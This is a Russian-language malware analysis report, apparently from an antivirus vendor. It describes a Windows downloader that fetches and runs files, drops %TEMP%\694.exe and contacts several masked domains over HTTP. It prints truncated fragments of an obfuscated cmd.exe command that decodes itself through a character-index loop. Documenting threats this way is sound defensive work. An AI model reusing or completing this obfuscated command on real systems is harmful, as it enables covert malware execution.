Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:O\C"set bl=IHiNKLidUBGqPsinWOBdMAhPLoDiwEYWw-\mTety(QpCZ{f9=Jk@$':g7u.6x4jVXbSza+r};8 ,lv0\)Fc&&for %j in (52,49,44,50,48,53,31,3,81,53,72,52,3,20,64,...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\694.exe
Сетевая активность
Подключается к
- 'sr###roup.com':80
- 'mi###land.com':80
- 'te###ored.co.uk':80
TCP
Запросы HTTP GET
- http://www.mi###land.com/q
- http://te###ored.co.uk/Ps
UDP
- DNS ASK sr###roup.com
- DNS ASK st###free.com
- DNS ASK ro###purit.com
- DNS ASK mi###land.com
- DNS ASK te###ored.co.uk
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:O\C"set bl=IHiNKLidUBGqPsinWOBdMAhPLoDiwEYWw-\mTety(QpCZ{f9=Jk@$':g7u.6x4jVXbSza+r};8 ,lv0\)Fc&&for %j in (52,49,44,50,48,53,31,3,81,53,72,52,3,20,64,...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:O/C"set bl=IHiNKLidUBGqPsinWOBdMAhPLoDiwEYWw-/mTety(QpCZ{f9=Jk@$':g7u.6x4jVXbSza+r};8 ,lv0\)Fc&&for %j in (52,49,44,50,48,53,31,3,81,53,72,52,3,20,64,48,15,37,32,33,25,65,62,37,82,38,74,3,37...
